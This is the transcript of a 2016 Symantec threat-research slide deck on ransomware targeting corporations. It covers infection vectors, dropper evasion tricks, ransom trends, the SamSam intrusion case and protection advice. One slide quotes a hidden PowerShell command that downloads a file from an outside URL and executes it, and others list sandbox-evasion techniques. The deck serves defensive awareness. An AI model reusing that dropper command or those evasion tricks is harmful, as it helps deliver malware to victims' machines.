Corporations - the new victims of targeted ransomware
-
Upload
cyber-security-alliance -
Category
Software
-
view
207 -
download
1
Transcript of Corporations - the new victims of targeted ransomware
Copyright 2016, Symantec Corporation
Candid WüestSymantec Security Response
1
Corporations –the new victims of targeted ransomware
Co
pyr
igh
t 2
01
6, S
yman
tec
Co
rpo
rati
on
Ransomware is popular…… because it is profitable
2
Co
pyr
igh
t 2
01
6, S
yman
tec
Co
rpo
rati
on
3© Forbes
Co
pyr
igh
t 2
01
6, S
yman
tec
Co
rpo
rati
on
WHY ?
4What if there were no hypothetical questions?
Co
pyr
igh
t 2
01
6, S
yman
tec
Co
rpo
rati
on
Because it is profitable!
$ 209 Million damageJan-March 2016
(according to FBI)
5A clear conscience is usually the sign of a bad memory.
Co
pyr
igh
t 2
01
6, S
yman
tec
Co
rpo
rati
on
– Link to malicious file on Dropbox & Co.
–Office document with malicious macro
– Script file (JavaScript, VBS, PowerShell, …)
• Sometimes in container (Zip, RAR, HTA, WSF, LNK,…) with password
• Infected Websites
–Web exploit toolkits (1.4 Mio attacks blocked / day)
• Rig, Magnitude etc.
–Malvertisement
• With any coding language out there
– Incl. Python, Powershell, JS, Google's Go Language,…
The common infection vector
6Hard work never killed anyone, but why take the chance?
Co
pyr
igh
t 2
01
6, S
yman
tec
Co
rpo
rati
on
Enabling Macros with Social Engineering
7I don’t suffer from insanity; I enjoy every minute of it.
Co
pyr
igh
t 2
01
6, S
yman
tec
Co
rpo
rati
on
Infection droppers trends
Use of scripting languages to evade detection/sandboxes
– Obfuscated: JavaScript, PHP, PowerShell, Python, VBS,…
– JS conditional compilation trick /*@cc_on @*/
– Macro to check for VM (environment checks)
• “InkPicture_Painted” instead Document_Open() or AutoOpen() trigger
• Application.RecentFiles.Count <3
– Script to check IPs before payload download (e.g. MaxMind service)
• Payload execution
– Execute dll with rundll32.exe and export string
– Seed parameter from JS (to decrypt payload)
– Encrypted archive or installer package
8
powershell.exe -ExecutionPolicy Bypass -WindowStyleHidden -command $f=[System.IO.Path]::GetTempFileName();(New-Object System.Net.WebClient).DownloadFile('http://********lied socialinnovation.org/plugins/office365', $f); (New-Object -com WScript.Shell).Exec($f)
2 + 2 = 5 for extremely large values of 2!
Co
pyr
igh
t 2
01
6, S
yman
tec
Co
rpo
rati
on
Powershell ransomware
9I used to be indecisive. Now I'm not sure.
Co
pyr
igh
t 2
01
6, S
yman
tec
Co
rpo
rati
on
Ransomware Cryptolocker expansion
10
100 new families identified in 2015 77 in 2014, 88 in 2016*
CAPS LOCK – Preventing Login Since 1980.
Co
pyr
igh
t 2
01
6, S
yman
tec
Co
rpo
rati
on
Ransomware-as-a-service
11I'd like to help you out, which way did you come in?
Co
pyr
igh
t 2
01
6, S
yman
tec
Co
rpo
rati
on
Top 10 infections on 29.10.2016
12… error joke not found
Co
pyr
igh
t 2
01
6, S
yman
tec
Co
rpo
rati
on
Show me the money
13
$372.53
$294.14
$679.65
$0
$100
$200
$300
$400
$500
$600
$700
$800
2014 2015 2016
• Ransom is usually requested in Bitcoins
• The average ransom has more than doubled last year
Artificial intelligence is no match for natural stupidity.
Co
pyr
igh
t 2
01
6, S
yman
tec
Co
rpo
rati
on
How to make even more money?• Payment features
– Tesla chat support and free sample decryption
– CryptXXX steals Bitcoin wallet data
– Cerber adds machines to botnet to carry out DDoS attacks.
– Use of Amazon/iTunes/phone gift cards instead of Bitcoins
• New threats added to ransom note
– Chimera threatens to post personal data online
– Jigsaw deletes random files over time
– Stampado re-encrypts already encrypted files from other cryptolockers
– Virolock Spreads to shares and cloud storage as fileinfector
14I didn't say it was your fault, I said I was blaming you.
Co
pyr
igh
t 2
01
6, S
yman
tec
Co
rpo
rati
on
Where are the victims?
15
3%Canada
8%
5%
United Kingdom
Belgium
Netherlands
India3%
Italy
3%
4% Germany
2%Australia
4%
8% Japan
United States
31%
Is “NO” the correct answer to this question?
Currently big wave in Brazil
Co
pyr
igh
t 2
01
6, S
yman
tec
Co
rpo
rati
on
16
Businesses as a target43% of ransomware infections occur inside organizationsEmployees like to open private emails at work
Smith & Wesson: The original point and click interface.
Co
pyr
igh
t 2
01
6, S
yman
tec
Co
rpo
rati
on
Advanced attack techniques
17
Recent ransomware attacks use tactics and techniques typically seen in “APT”-style attacks
Infiltration Exploit server-side vulnerabilities to gain access to the network.
ReconnaissanceAttackers gather information that may help in later stages of the attack, such as back-up policy. Information gathered may also be used in the ransom note.
Lateral movementAttackers use publicly available tools to plot out and traverse the network and gain access to strategic locations like ICS or DB systems
StealthOnce the attack has been successfully carried out the attackers attempt to hide their tracks by removing any tools used.
What happens if you get scared half to death, twice?
Co
pyr
igh
t 2
01
6, S
yman
tec
Co
rpo
rati
on
Example: SamSam case
• Entry point was unpatched web server; exploited JBoss vulnerability with JexBoss
• Used psExec and retrieved passwords to traverse the network
• Deleted backups to make recovery difficult
• Deployed SamSam strain of ransomware
• Removed copies of malware and associated tools to hide tracks
• Ransom was 1.5 Bitcoin (~US$989) for each computer
18Everyone is entitled to his own opinion, but not to his own facts.
Co
pyr
igh
t 2
01
6, S
yman
tec
Co
rpo
rati
on
Further TTPs seen
• Attack remote access tools
– Bruteforcing passwords for RDP, Teamviewer, VNC, FTP, …
• Exploit webserver and jump further from there
– SQLinjection to modify DB content
• Spear phishing
• Some groups try POS or BEC scams first, and then move to ransomware
• Some «ATP» groups use ransomware instead of wiper to hide intention
19I can explain it to you, but I can not undestand it for you
Not very sophisticatedBut often successful
Co
pyr
igh
t 2
01
6, S
yman
tec
Co
rpo
rati
on
What are they after?
• Documents
• Databases (encrypt data or change password)
• Fileshares/cloud (even if not mapped: passwords from mimikatz or enumtools)
• Websites
– E.g. added «mcrypt_encrypt()» to DB calls
• The backups (to delete them, infect them or encrypt them)
• In some rare cases industrial controller, more likely classical blackmailing
20If I agreed with you we’d both be wrong
Co
pyr
igh
t 2
01
6, S
yman
tec
Co
rpo
rati
on
Victim organization profile
Services37.8%
Manufacturing17.2%
Public Administration 10.2%
Finance, Insurance, & Real Estate
9.8%
Wholesale8.9%
Transportation, Comms, & Utilities
6.6%
Retail4.3%
Construction3.9%
Mining1.0%
Agri, Forestry, & Fishing0.5%
What about Healthcare?
Healthcare seeing more targeted attacks and
therefore not reflected in the numbers
21All generalizations are false.
Co
pyr
igh
t 2
01
6, S
yman
tec
Co
rpo
rati
on
Crypto is difficult (for most people)
22Press SPACEBAR once to quit or twice to save changes..
Co
pyr
igh
t 2
01
6, S
yman
tec
Co
rpo
rati
on
Protection strategies
• Backup your data (out of reach!)
• Keep your system and software up-to-date
• Doublecheck shared folders
– Does it auto sync to cloud?
– How is your fileserver protected?
• Follow best practices (2FA, security software,…)
– Disable scripts, powershell etc. if you dont use it
• Be prepared - play the exercise drill
• Some have experimented with «honeyfiles» and «folder-sinkholes»
23Always remember you're unique, just like everyone else.
Co
pyr
igh
t 2
01
6, S
yman
tec
Co
rpo
rati
on
Don’t forget your phones
24
• Android Ransomware is out there
• IoT device ransomware not seen at large in the wild, but possible
Co
pyr
igh
t 2
01
6, S
yman
tec
Co
rpo
rati
on
100 new families identified in 2015, most not sophisticated
Scripts are popular to evade first-step detection
Employees in organizations represent 43% of infections
There are ransomware groups going after organizations
Most attacks are not targeted, but still devastating
It is profitable for the attackers, so it won’t go away overnight
Summary – keep your data safe!
25Better to understand a little than to misunderstand a lot.
Thank you!
Copyright © 2016 Symantec Corporation. All rights reserved. Symantec and the Symantec Logo are trademarks or registered trademarks of Symantec Corporation or its affiliates in the U.S. and other countries. Other names may be trademarks of their respective owners.
This document is provided for informational purposes only and is not intended as advertising. All warranties relating to the information in this document, either express or implied, are disclaimed to the maximum extent allowed by law. The information in this document is subject to change without notice.
Threat Researcher - Symantec Security Response
Candid Wüest
Co
pyr
igh
t 2
01
6, S
yman
tec
Co
rpo
rati
on
27I like birthdays, but I think too many can kill you.